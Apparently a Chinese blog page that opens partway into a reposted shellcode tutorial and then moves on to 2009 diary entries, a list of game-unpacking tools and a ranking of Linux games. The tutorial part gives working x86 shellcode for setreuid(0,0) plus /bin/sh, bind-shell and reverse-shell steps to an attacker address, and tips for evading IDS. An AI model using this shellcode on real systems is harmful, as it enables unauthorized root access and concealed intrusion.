xor ebx,ebx     参数一:真实用户id(ruid)=0
xor ecx,ecx     参数二:有效用户id(euid)=0
xor eax,eax
mov al,0x46     系统调用0x46
int 0x80        设置setreuid(0,0)
有了root(0)用户权限,系统基本就归你指挥了。
 
2、执行/bin/sh: 有了特权,还要有个"工作室",shell是Linux常用的控制台,取得一个有特权的shell,就可以让你"随意"工作了。建立一个shell并不复杂,一般采用execve调用执行/bin/sh软件
char *shell[2];
  shell[0]="/bin/sh";
  shell[1]=0;
execve(shell[0],shell,NULL);
该调用C语言编写很简单,对应的汇编代码也不复杂:
xor eax,eax         eax=0
push eax            eax=null
push 0x68732f2f     压栈 //sh
push 0x6e69622f     压栈 /bin
mov ebx,esp         ebx=esp指向/bin/sh
push eax            eax=null  结束栈null
push ebx            参数2   ebx指向/bin/sh
mov ecx,esp         参数3   ecx指向["/bin/sh",NULL]
xor edx,edx          参数4   edx=NULL
mov al,0xb           参数1   eax=0xb
int 0x80
 
    综合以上两个部分,就是最常见的Shellcode了,具体生成的16进制代码如下(共35个字节):
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80            ;setreuid(0,0)
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1
\x31\xd2\xb0\x0b\xcd\x80                          ;执行/bin/sh
该代码可以放置在缓冲区内,通过指针函数调用执行。在缓冲区溢出等方式获得执行权利时,运行该段代码就可以打开一个具有root(0)权限的shell界面。
    Shellcode在不同的场合,可能有严格的限制,比如在命令行溢出漏洞时,不能太大,没有有效的空间来存放代码,所以要严格精简代码的长度。在SQL注入时对长度的要求更加苛刻,所以很多业界流行的、优秀的Shellcode是经过各种技巧精练的结果。Shellcode是攻击注入代码的统称,并非一定是打开Shell,根据漏洞程序本身的特性有很多的改变,有兴趣的朋友可以从网上收集。
 
3、绑定到端口的Shellcode
    用shellcode在目标计算机上打开一个端口(通讯服务),并将Shell绑定到该端口,攻击者可以放弃入侵时的用的端口,等于在目标机器上建立了系统的后门。该端口可以为入侵者随时建立连接,因为是打开了shell,所以等于建立远程控制目标的控制台。
    开启服务离不开Socket,Socket定义为一个端口和一个IP到一个进程的绑定。
a) 建立本地IP Socket,TCP
  int server
  server=socket(2,1,0)
b) 用IP和端口建立一个Sockaddr_in结构
  struct sockaddr_in server_addr
    server_addr.sin_addr.s_addr=0         socket的地址设为本地地址
    server_addr.sin_port=0xBBBB         socket的端口设为0xBBBB=48059
    server_addr.sin_family=2              协议族为IP
c) 将端口和IP绑定到Socket上
  bind(server, (struct sockaddr *)&server_addr, 0x10)
d) 以监听模式启动socket:打开端口并等待连接
  listen(server, 0)
e) 有连接时,向客户返回一个句柄
  int client
client=accept(server, 0, 0)
f) 将返回的句柄,复制到stdin、stdout、stderr,shell输出到攻击者(client)的屏幕
  dup2(client,0)
  dup2(client,1)
  dup2(client,2)
g) 调用普通的execve执行shellcode
  char *shell[2];
shell[0]="/bin/sh"
    shell[1]=0
execve(shell[0], shell, 0)
 
4、反向连接的shellcode
    当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用上边的shellcode建立了服务后门,你还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接。
    很多木马就利用这种方式,主动连接带木马的管理者,"神不知,鬼不觉"地把目标计算机加入到某个"僵尸网络"的黑社会团伙中。
a) 建立本地IP Socket,TCP
  int soc
  soc=socket(2,1,0)
b) 用IP和端口建立一个Sockaddr_in结构
  struct sockaddr_in server_addr
    server_addr.sin_addr.s_addr=0x660A0A0A   socket的地址设为10.10.10.102
    server_addr.sin_port=0xBBBB             socket的端口设为0xBBBB=48059
    server_addr.sin_family=2                 协议族为IP
c) 建立反向连接connect
  int remote
remote=connect(soc, (struct sockaddr*)&server_addr, 0x10)
d) 将socket复制到stdin、stdout、stderr,shell输出到攻击者的屏幕
  dup2(soc,0)
  dup2(soc,1)
  dup2(soc,2)
e) 调用普通的execve执行shellcode
  char *shell[2];
shell[0]="/bin/sh"
    shell[1]=0
execve(shell[0], shell, 0)
注意:10.10.10.102为防火墙外攻击机器的地址,此时在该机器上要启动一个监听48059端口的服务
 
5、躲避IDS的过滤
    由于经典的Shellcode并不是有很多的版本,大多数人员都是采用同样的Shellcode,很少有人自己编写。所以IDS厂商把常见的Shellcode的指纹提取出来,作为验证攻击行为的"特征",很多攻击行为就暴露在IDS的监控之下,网络管理人员可以很快知道你到了他的网络内部,进而采取"捕获"措施。
    所以,隐藏指纹,变换代码,Shellcode也在不断更新。技术很多,这里就不例举了,提一个有意思的思路:因为Shellcode的基本功能相同,都是诱使目标机器执行这些指令,目标代码在传输和存放时是很容易被IDS或系统察觉的,那么直到被执行前才恢复原来面貌是一个好注意。所以有人通过把代码简单移位,"加密"后的代码没有任何"意义",到执行前再反向移位,被检测到的概率就小多了,这种方式对躲避IDS是很有效果的。
文章来源:zhaisj.blog.51cto.com/219066/61428

变化

今天又有个同事要出国了,一天我们都聚到一哥们家里打麻将,可惜我这人不好这个,看了一整天电视,给我累的要命,我发现我是一个很不能塌实下来做事情的人.除非有很有力的约束.不过我一向叛逆于约束,所一找个能约束自己的女人应该是自己的福分,希望在2010之前实现这个愿望.
一个个都走了说实话公司的地铁项目成功率极其高但是就现在的人员配备和那个只知道往自己兜里弄钱的领导是不会考虑长远发展的,反正倒闭了还有总公司给顶着.感觉很辛酸,这几年自己的确虚度了光阴.

Saturday, March 14, 2009

公寓食堂的伙食越来越不成样子了

今天一看所有的菜都有肉,我实在恶心这个.不是说有肉不好,只是火候都不到,而且那肉色味都是让人看了就不爱吃的.或许我不怎么吃肉的原因就是这样造成的吧.今天打了份宫暴鸡丁,差点没将我吃死,吃完了看会电脑就头晕,恶心,然后用手法将这些吃的东西都吐出来了,整个人精神多了.吃了碗泡面和几块菠萝.不过现在喜欢上以前最讨厌的工业圆伙食.

Friday, March 13, 2009

研究了下剑侠的压缩工具

终于发现剑侠的XPack来自一个项目LZO的压缩,其内部分配格式为
index id time filename  Size InPakSize ComprFlag CRC
UCL 1.01 built Aug 15 2007
相关LZO的站点:http://www.oberhumer.com/
准备从研究金山的游戏进入游戏大门

Wednesday, March 11, 2009

部分游戏解包工具

http://bbs.2dgal.com/read.php?tid=38246&page=e
-------------------
RPGVIEWER
这个是国产的,针对具体游戏很有效果!
AFSExplorer
解包PS2游戏afs格式文件的工具,可以从afs文件里提取文本、字库、图片、语音等等等。同样也是属于实况足球10用的工具。不过如果你所中意的某款PS2游戏使用的是AFS格式的话,那么你就可以通过使用这个工具并配合上面的 OPTPIX.IMAGESTUDIO.V3.12A-TRiNiTY来提取CG了。

DkZ Studio 084b
同样是解包 PS2游戏afs格式文件的工具,可以从afs文件里提取文本、字库、图片、语音等等等。同样也是属于实况足球10用的工具。不过如果你所中意的某款 PS2游戏使用的是AFS格式的话,那么你就可以通过使用这个工具并配合上面的OPTPIX.IMAGESTUDIO.V3.12A-TRiNiTY来提取CG了。另外这个工具有ADX->WAV音轨的转换功能。(ADX,PS2常用的一种音轨格式,MO THEN AGAIN的音轨就是用这个东西来转换的),另外这个工具对AFS文件的支持有时候不如AFSExplorer。如果使用这个解不了的一些AFS,不妨试试用AFSExplorer解。

Susie32+Susie32解包插件
这个就不多说了,配合相应的插件可以解许多归档文件包,也可以解许多压缩了图片。总之,就是windows下提取GALGAME CG的强大工具。汉化PC游戏的时候可以用到一些。

ExtractData.zip
06年3月出现一个解包器,支持很多GALGAME游戏的解包,同时附带源代码。日本的现在是1.2版本

HyperPackage010.rar
支持大部分ego游戏的解包和封包。同时还支持SHUFFLE(好象)

KID游戏提取机.zip
这个不用多介绍了吧。

LeafUnpacker010b.rar
支持ToHeart2 XRATED和Tears to Tiara解包。

giga_pac_unpacker_Ver1.00.rar
支持戏画的Parfait、青空、Fossette的解包

BFE_pac_unpacker_Ver1.00.rar
支持戏画的BALDR FORCE EXE的解包

Studio e.go!公司提取工具
名称:Ego_Unpacker 英文版
通杀所有该公司出品的游戏 不仅能提取CG 其他数据同样一网打尽

==============
再转[部分地址无效]
http://yydzh.com/simple/index.php?t320408.html
-----------------
抽取游戏CG工具

Studio e.go!公司提取工具
名称:Ego_Unpacker 英文版
下载地址:http://free5.ys168.com/?windseven
备注:
通杀所有该公司出品的游戏 不仅能提取CG 其他数据同样一网打尽

Leaf游戏专用提取工具
名称:LeafUnpacker 中文版
下载地址:http://free5.ys168.com/?windseven
备注:
同样来自风七的作品 向您致敬!

KID游戏专用提取工具
名称:KTG_v15b050905(Kid Tools GUI) 英文版
下载地址1:http://pickup.mofile.com/ 提取码:2852839562422957
下载地址2:http://free.ys168.com/?firebird2005

RPG游戏提取工具
名称:RPGViewer
下载地址:http://free.ys168.com/?pigspy
备注:
不要忘记同时下载RPGViewerSupportFile,并解压至RPGViewer目录。可导出的游戏清单详见第23楼。

名称:ACG Converter
官方地址:http://www.angelfire.com/nm/fbkcfy/

备注:
若访问不了 请挂国外代理 去这里找:http://cnproxy.com/
软件使用说明见这里:http://www.westside.co.jp/otacd/help/mcgconv/mcgconv.htm

名称:Susie 英文版
官方地址:http://www.digitalpad.co.jp/~takechin/
备注:
鼎鼎大名的老牌提取工具 功能虽比不上Grapholic强大 但自身拥有丰富的解码插件及外围Spi制作者的支持 注定在这个领域它是绝对的霸主

名称:Grapholic 英文版
下载地址1:http://pickup.mofile.com/ 提取码:1441402290848042
下载地址2:http://free.ys168.com/?firebird2005
备注:
Grapholic可自动侦测到spi插件 不过若想加载这些插件尚需做些设置 具体设置如下:
进入Option—Settings—Plugins选项菜单 勾上Enable Susie Plugin一栏 然后在下面的插件显示列表右边点击Enable即可
另外Susie32 Plugin has first pr一栏 意为优先选择Susie解码插件 可根据自己需要勾上与否

名称:SPI2BMP 英文版
官方地址:http://www.marchen.to/
备注:
Susie的辅助工具 支持SPI插件集 可批量转换CG成BMP格式

名称:MamiList3 日文版
官方地址:http://www.dsl.gr.jp/~sage/mamitool/mlist3/
备注:
主要针对Elf公司的资源解码,也包括Silk's的Flutter of Birds/Flutter of Birds II两游戏

名称:FMV-Extractor 英文版
官方地址:http://www.necrotech.de/
备注:
在其他工具无能为力的情况下,不妨试试这个工具,或许它能带给你惊喜。Kaguya出品的游戏背景图我就是靠这个工具搞定的。

名称:Dragon UnPACKer 5 英文版
官方地址:http://www.elberethzone.net/
备注:
针对欧美游戏的资源提取,网站上附有可解游戏清单。

提供SPI解码插件或相关信息的网站
http://m-akita.sakura.ne.jp/
http://www2f.biglobe.ne.jp/~kana/link.html
http://hajikaki.ld.infoseek.co.jp/
http://homepage1.nifty.com/k_okada/index_e.htm
http://www.asahi-net.or.jp/~ds8h-wtnb/software/index.html http://elku.at.infoseek.co.jp/other.html
http://www.westside.co.jp/

2008年Linux的25个顶级游戏

如果你对linux平台的游戏感兴趣,那么你一定知道这个游戏可能是开源的,大多数也是免费的,你可以只有的更改,这些特性就造成了Linux游戏是这样的流行,一个开发者可以做出一个好的游戏并使它完善,和世界上的人分享,变成一个英雄。所以,在大量的Linux游戏存在的情况下,为什么还在私有游戏浪费你的时间和金钱呢?

我们下面就列出了2008年Linux平台的25个顶级游戏,我们开始为这些游戏排名左右为难,但我们明确的相信Spring在2008的名单中排头。

考虑到每个游戏类型之不同,且在它们的联盟中都是最棒的,我们对这个排名做了些保留。比如我们把一些玩家爱喜欢的freeciv放到#3,而其他的更喜欢 简单一点的Battle for Wesnoth 韦诺之战放到#6,有的呢则一点也不喜欢文明之类的游戏,而他们痴迷于老游戏,Tux Racer (#18)。 列出来的游戏我们主要关注与他的Linux发行版的版本,同样的有些游戏也有window和mac版本,我们同样在没有游戏的后面增加了价格,链接,下载 等信息。

Spring - (Linux, Windows) 比起2007,你更期待2008的排行吗?那看看Spring (也称TA Spring 或者 横扫千军: Spring) . TA Spring 可以毫无瑕疵玩横扫千军中所有的场景. 可以支持5000个一样的单位同时作战,只受你电脑能力的限制. 你可以在3D高清晰地图上发到大型的战争,通过照相机模式,可以通过任何一个角度观察战争. 游戏每次只适用很多修改版块中的一个.价格: 游戏的核心以GPL协议发布. 幸运的是现在任然有两个修改版以GNU/GPL协议发布,还有一些没有明确的发布形式(被修改者所有). 然而也有一些以Atari版权发布. 如果想玩,就必须取得他原始的游戏.下载.

TremulousTremulous - (Linux, Windows, Mac) 这是一个自由开源的FPS游戏, 和Quake2的Gloom很像. Tremulous是个分两组游戏,一边是人类,一边是异形,每边都有自己的缺点和优点.双方的玩家都可以像即时战略的形式来建造建筑. 游戏的最终目的就是消灭对方. 消灭的方法不光是消灭对方的人,同样可以破坏对方的建筑,.一个游戏已经被下载了10W次.他在MOD database的mod之年之2006的比赛中被评选为"玩家单机游戏最佳选择", 在 Moddb.com 2007比赛中的 单机游戏 中获得第五名. 不过重2006年到现在还没有新的版本发布. 价格: 免费.下载 (Linux, Windows) 下载 (Mac).

FreeCivFreeCiv - (Linux, Windows, Mac)这个开源游戏始于史前史,你的任务就是领导你的部落从石器时代走向太空时代. 这个游戏类似于Sid Meier出品的《文明》. 它是回合制策略游戏 ,你可以通过你领导的部落历史上最强大的文明.你的目标就是建设城市, 采集资源,组建你的政府,并且建设一个军队.这个可能是开源游戏里边最上瘾的帝国建造策略游戏了. 支持3个角色设置, 因为太流行了,被翻译成了29种语言,支持30个用户通过互联网,局域网连战. 价格: 免费. 下载.

NexuizNexuiz - (Linux, Windows, Mac) Nexuiz 已经被一个Lee Vermeulen为首叫做 Alientrap的 业余编程爱好者团队开发了近5年,.它们的目标是创建一个免费的可以和商业游戏相媲美的动作游戏. 它是一个完全通过网络完成的3D对抗游戏 ,目的是为了让游戏回到起点 ,加上完美的武器平衡和快节奏的动作,使它于现实种的枪手完全不同. 它使用Evil Lair开发的HFX纹理 ,现在呢有27的地图可供选择.通过高级的用户接口,可以在15个玩家模式之间选择, 每模式有两个皮肤, 可以来连接到主服务器和世界各国的玩家同场竞技. 这个游戏开源,跨平台,FPS. 现在的版本是, 2.2.3, 于2007.1发布. 价格: 免费. 下载.

Alien Arena外星人竞技场- (Linux, Windows) Alien Arena是即时,回合,策略,动作游戏, 快,且好玩. 这个游戏包括单用户作战,和更加突出的多用户作战. 不过这些已经是过去,因为现在 6.10版本 加入和更大的改进,增强和很多惊喜. Alien Action 第一次发行是在2004.10. 从初始版本到现在每个方面都在不断的修改.现在看起来就像一个新游戏. 最新的版本包含了7个崭新的竞技场 ,加入了声效和武器集 (加入和新武器Violator!), 和在决斗模式中可以实现1 VS 1 . 输入和网络代码的优化改进使即使在150以上的PING值也可以流畅的游戏. 最后,但不是不重要, CURL实现地图和内容更快下载 . 价格: 免费. 下载 (如果你已经有了Alien Arena 2007, 你需要在其基础上安装6.10来给它打个补丁.)

韦诺之战 - (Linux, Windows, Mac) 不过一切的为了Wesnoth的王位而战斗, 或者尝试才发布的 1.3.15版本中的历险. 游戏的背景设置在一个16个种族和6个小团体的幻境中. 有200单位生产不同的武器和能力. 6个主要的种族. 有人类 侏儒 兽人 矮子,侏儒 不死,鸭子 . 随着游戏的提高,玩家可以和其他种族结盟,比如 saurians, merfolk, nagas, ogres, trolls and woses. 只有最后现在和8个朋友对战. 比起Freeciv,有些人更喜欢Wesnoth的可上手性. 这个网站很有趣,包括了Wesnoth的历史和游戏的历史, 和人物特性和地理位置的描述. 价格: 免费. 下载.

Scorched 3DScorched 3D - (Linux, Windows, Mac) Scorched 3D是一个类似于经典DOS游戏Scorched Earth的战斗游戏, Scorched 3D 增加了一个3D的岛屿的环境和对联网对战的支持. 其最底层只是一个有两个坦克的炮兵部队攻击对方敌军的一个场景.选择好你的角度,方向,发射你的武器,尽量使对方的坦克爆炸.当然,这是最基本的任务.而 这个模式使它成为了2008的赢家.游戏还有启示, 操作坦克, 清道猎杀, 爆炸战争等很多MOD. 版本41.6才在2008.1.20发布 价格: 免费. 下载.

Frets on FireFrets On Fire - (Linux, Windows, Mac) Assembly Demo Party 2006的赢家, Frets on Fire 是 Unreal Voodoo开 发的以完成音乐和视频的游戏. 玩家像弹吉它一样的来用键盘,更随着屏幕上滚动的音乐乐谱来完成任务. 一只手用来按 'frets' (F1 to F5)另一只按 'picks' (Shift or Enter). 通过按 'frets'来播放那些着色的标记,按 'picks'来掌握准确的. 游戏中也有音乐编译和指南. Frets on Fire是自由开源软件. 它用Python开发,且基于GPL发布,某些代码通过其他自由协议发布. 但是它其中的歌曲和字体是私有的,所以不可以再发布. 价格: 免费. 下载.

Secret Maryo Chronicles超级玛丽历代记 - (Linux, Windows) Secret Maryo Chronicles (SMC) 是一个二维的开源游戏,类似于一般的通关游戏. 华丽的图形和有趣的通关,让您耳目一新,想起了超级马里奥. SMC 集成了一个游戏编辑器 - 通过按F8来激活. 你可以增加第二,改变你在每关的起始点, 添加活动的精灵, 可以创建一个正好你可以跳过的精灵,等等. .去上面的网站了解更多关于不同图形, 精灵, 和起始位置. 尽管SMC很简单,但是Powerup层把smc搞得很复杂也很有趣. 价格: 免费. 下载.

World of PadmanWorld Of Padman - (Linux, Windows, Mac) WOP 是使用Quake3引擎的漫画风格的游戏. 这个游戏的特性就是支持所有的游戏类型. Padman在2007个人游戏MOD比赛中 夺得了第四名. 价格: 免费. 下载.

Vendetta深仇大恨 - (Linux,Windows, Mac) 游戏中玩家扮演在无垠的宇宙中的航天飞船驾驶员. 用户可以用自己的风格来塑造人物形象, 可以是一个企业首脑,军事英雄,或者是一个歹徒。加上在一个巨大的银河中一个快节奏和"转变"战斗模式给人强烈的冲击,. 在一些NPC制造的经历抢夺,政治阴谋,冲突等环境下,几大派别可谓是势均力敌. 完整的宇宙和详细的故事情节,造就了非一般的游戏体验. 价格:游戏可在无附加任何条件的情况下免费使用, 试玩时间限制为8个小时. 觉得好玩,可以升级为付费版. 下载 (使用帐户).

SauerbratenSauerbraten - (Linux, Windows, Mac) Sauerbraten (a.k.a. Cube 2)是一个基于 Cube FPS的从新设计版本的单、多用户游戏.尽管 Sauerbraten和Cube在游戏设计思路上有共同之处, 但是它有一个6向定点世界模式. 这个补充使游戏具有了更复杂的几何图形,. 和Cube很像的地方在于, 游戏的目的并不是简单的满足于视觉上的效果,而是在游戏的同时动态的创建地图. 此为这个FPS游戏十分的耐玩,他的引擎正在被用来研发一个RPG游戏. The scenes are reminiscent of Myst, with Gothic perspectives and realism. 价格: 免费. 下载 (Linux, Windows) 下载 (Mac)

VDriftVDrift - (Linux, Windows, Mac) VDrift是一个跨平台开源的模拟驾驶游戏.他有16个跑道和29个车型. 它使用一个简单的网络多用户模式连战.您可以使用鼠标,键盘和手柄来控制. 游戏中可以任意的改变游戏和车型的设置,对比赛回放,也有多种的模式。. 价格: 免费. 下载.

VegaStrickVegastrike - (Linux, Windows, Mac) Vega Strike是一个GPL下发布的三维的RPG游戏,玩家可以进行贸易和悬赏追捕. 你任职于一个旧的旅客货船上, 你根本就不是知道你生活的未来是什么,工作正好可以维持生计. 危险就在不远的地方.随着时间的推移,你会发现有大量的政治实体出现,并且它们并不都是和平相处的.. The Vega Strike 引擎是Privateer Gemini Gold, Privateer Remake, Vega Trek, 和 Pi Armada projects的基础. 价格: 免费. 下载.

Battlestar Galactica群星尽头:第二基地 - (Linux, Windows, Mac) Beyond the Red Line 是一个单机游戏,由Volition and Interplay开发的《自由空间(freespace)》转换而来. 根据一个叫 Battlestar Galactica的TV秀而来. 你将会对船模的高解析度和高质量声音而惊叹, 游戏内置音乐由Bear McCreary和Richard Gibbs制作. 联机可以和你的朋友进行对抗赛,多玩家包括死亡竞赛, 抢占据点, 和其他像《Viper》的一些模式 . 价格: 免费. 下载.

ExcaliberExcalibur: Morgana's Revenge v3.0 (EMR 3.0) - (Linux, Windows, Mac) EMR 是唯一一个基于Aleph One (马拉松) 引擎. 是包含一个史诗般的故事情节的第一人称动作冒险游戏. 作为盟军在你的最后任务中启航探险,发现你的任务才刚刚开始. AI Merlin教会了你时光旅行技术,且告诉了你新的任务: 从Morgana和它的下手中拯救出人类. 穿过野生丛林, 城堡竞技场, 穿过未来饱经战乱的街道, 你将随时挥舞武器 - 包括Sword of Power,Excalibur - 试图解开恶魔的秘密阴谋. EMR冒险 , 42个单独的关卡, 编织了一关于事实,真诚, 勇敢的传说, 和背叛的阴暗面.. EMR是你沁入在一个惊奇的世界, 是你得到快乐的游戏体验. 价格: 免费. 下载.

True Combat Elite TrueCombat: Elite (TC:E) - (Linux, Windows, Mac) TC:E 是一个现在社会的完全免费的的单机FPS游戏.,Truecombat Elite由玩家制作,自己娱乐. TC:E现在正在被GrooveSix工作室和TeamTerminator共同开发.TeamTerminator因开发基于Q3的 TrueCombat系列而广为人知, GrooveSix工作室起于TrueCombat的辞职创建者,因此它经历了一个Q3的创建过程, TC:E 希望更多的奉献于游戏联盟,到那个时候TC:E会让你成为两个攻击冲突力量中强大的雇佣兵. 价格: 免费. 下载.

Tux RacerTux Racer - 一个用LINUX吉祥物-tux来制作的一个企鹅滑雪下坡的3D游戏. 选择杯子然后就是了和电脑的比赛. 当你解锁了默写关卡后,杯子会给你更多的惊险刺激的关卡. 网站上说Tux Racerz在2001.10.19发布0.6.1版本.虽然这样老了,但是它确实是个很好玩的游戏,因为你可以记录自己的通关记录,通过小小的修改可以 玩到新鲜的东西. Tux Racer 有大量的设置,可以通过添加地图,比如添加三个光珊图片来定义物体的高度和摆放位置. 价格: 免费; 下载.

TORCSThe Open Racing Car Simulator (TORCS) - (Linux, Windows, Mac) TORCS高度移植的仿真驾驶游戏.它被来当作普通的游戏,而把AI racing当作一个研发的平台. TORCS 中有50个车型,20个赛道,50个竞技板块. 在平台支持的情况下可以使用手柄和转盘来掌舵. 图形有灯光,烟雾,刹车板. 同时也模拟了一个简单的物理破坏模型:撞车,爆胎,车胎的软硬, 空气动力学等. 从简单的联系环节到冠军赛都有不同的比赛类型可供选择. 在分屏模式下最多4个玩家可以比赛.下个开发目标就是要实现网络连战. 价格: 免费. 下载.

Flight GearFlight Gear - (Linux, Windows, Mac) 灵感来自于对现在商业战斗游戏的不满意.Flight Gear 项目就是为了填补商业游戏的缺点. FlightGear项目创建的一大目的是开发出一个精密的战斗方针框架出来,这个框架主要用于教育研究、追赶其他有趣的游戏框架, 也可以作为一个最终用户程序. 开发成员毫不自疑的认为任何人只要对这个项目感兴趣都可以为这个框架的扩展和提高做贡献. 另外, Flight Gear 有些模拟的精准和使用的地形,可以帮助你瞄准目标价格: 免费. 下载.

ManiaDriveManiaDrive - (Linux, Windows) ManiaDrive是Trackmania免费克隆版,由Nadéo工作室制作, 这是一个街机汽车游戏,玩的时候让你刚到紧张 (记录重来没有被超过1分钟的), 像原来的版本一样有个网络模式. 一旦你安装了,你会在跑道上以极速跑离车道,让人不禁联想到特技赛车.游戏配备了复杂的汽车图形, 挑战"故事模式" ,一个跑道编辑器, 局域网,互联网模式,HTTP接口专用服务器, 30多个街区的完整音乐. 跑道边的广告音乐是 Maniadrive的一些优秀的音乐伴奏. 音乐既合适也有相当高的品质 . 价格: 免费. 下载.

D2X-XLD2X-XL - (Linux, Windows, Mac) D2X-XL是Descent目前功能最丰富的一个版本,因为它提供诸如彩色光, 烟雾, 实时影子,新的武器特效和更加到多玩家模式.作为Discent的一个重要移植版,它保留了对原游戏的兼容性并可以一个图形升级版来改变外观. 当你到网站去的时候, 价格: 免费. 下载.

Hammer of ThyrionHexen II: Hammer of Thyrion - (Linux, Windows, Mac) 在2000年, Raven Software 发布了射击游戏Hexen II的源代码和它的多玩家扩展HexenWorld. 从那个时候开始就有了基于它源代码的移植游戏, 比如 已经停止了的Anvil of Thyrion项目, 2002年之前它在linux没有任何的动作. The Hammer of Thyrion跨平台源代码移植: 开发者继续在linux ,bsd , mac os x ,windows上长期的支持. 溢出了很多BUG,增加了很多模式,改进鼠标的操控,视屏模式,和更充分的利用了OpenGl的特性 价格: 免费. 下载.

Ultimate StuntsUltimate Stunts - (Linux, Windows) 这个汽车游戏之所以榜上有名是因为它是正在开发中的伟大杰作. UltimateStunts是著名的DOS游戏stunts 的改造版. 虽没有完成,但是对原来的游戏来说有很大的提高啊. Stunts 只是一个使用CGA/EGA/VGA图形的老DOS游戏, 但是 Ultimate Stunts是一个现代的多平台程序. 在游戏中有种玩特技的感觉,比如回环,盘旋,跳桥等动作. 同上也具有多玩家,编辑地图,3D音效等特性. 价格: 免费. 下载.

America's ArmyAmerica's Army: Special Forces - (Linux, Windows, Mac)我们在犹豫是否把这个列入名单,但是它确实是现在很流行的,且要占领更大的市场. 我想把在这个游戏后面的故事给大家说说. America's Army 是一个免费的游戏,提供给美国招募军队和训练的时候使用. 但这样引起了一个对道德的争论 (网速慢的玩家被重定向到可以免费获得这个游戏CD的美国军队招募中心). 不过进一步的来说,这个游戏很严肃不具有很强的娱乐性. 比起其他军队的射手,玩家的原型运动细节的捕捉上要相信N倍.在最近的版本中,它更像是一个FPS游戏了.因为这个是这个游戏失去了团队任务的特性,. 考虑到这个游戏是美国军队出品了,我们怀疑钢盔上面是否有洞. 在 GameSpy调查了这个游戏发现从2002到2005平均有4500人玩.对美国军队来说应该可以排入网络游戏的前十名了. 价格: 免费. 下载.